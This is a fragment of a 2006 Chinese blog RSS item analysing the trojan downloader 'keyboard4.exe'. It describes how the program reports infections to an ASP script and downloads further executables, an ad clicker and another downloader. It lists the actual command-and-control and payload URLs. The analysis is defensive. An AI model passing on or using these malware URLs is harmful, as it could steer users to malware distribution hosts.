<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L030160805727A860 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard4.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L030160C05A290923 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L0300E1C0421FF7AB title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word">和以前描述过的<A href="http://daishuo.blogchina.com/4662155.html">keyboard2.exe</A>, <A href="http://daishuo.blogchina.com/4693828.html">keyboard3.exe</A>功能类似，是个变种。<BR>keyboard4.exe是个木马下载器。<BR>运行后，首先向一个网络asp脚本提交新增感染报告，提交形式如下：<BR><A href="http://www.nonameforthisdomain.com/teller2.asp?rnd">http://www.nonameforthisdomain.com/teller2.asp?rnd</A>=[随机数]<BR>然后获得一个要下载程序的列表：<BR><A href="http://www.nonameforthisdomain.com/data.asp?rnd">http://www.nonameforthisdomain.com/data.asp?rnd</A>=[随机数]&#038;antisp=1<BR>当前下载列表的内容如下：<BR><A href="http://content.dollarrevenue.com/keyboard4.exe">http://content.dollarrevenue.com/keyboard4.exe</A>，就是keyboard4.exe本身<BR><A href="http://content.dollarrevenue.com/mousepad4.exe">http://content.dollarrevenue.com/mousepad4.exe</A>，一个广告点击程序，可能弹出广告窗口<BR><A href="http://content.dollarrevenue.com/newname4.exe">http://content.dollarrevenue.com/newname4.exe</A>，木马下载器</SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN></P><!--AD_Link_Data_Begin-->
<p align="center"><span style="font-size: 0.8em">本篇文章使用<a href="http://www.aigaogao.com/blogeditor/index.html" target="_blank">aigaogao</a> Blog软件发布, <a href="http://www.aigaogao.com/blogeditor/download.html" target="_blank">“我的Blog要备份”</a></span></p>
<p><!--AD_Link_Data_End--></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/03/24/790359.aspx/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Dynamic page generated in 0.427 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2013-03-14 04:52:36 -->
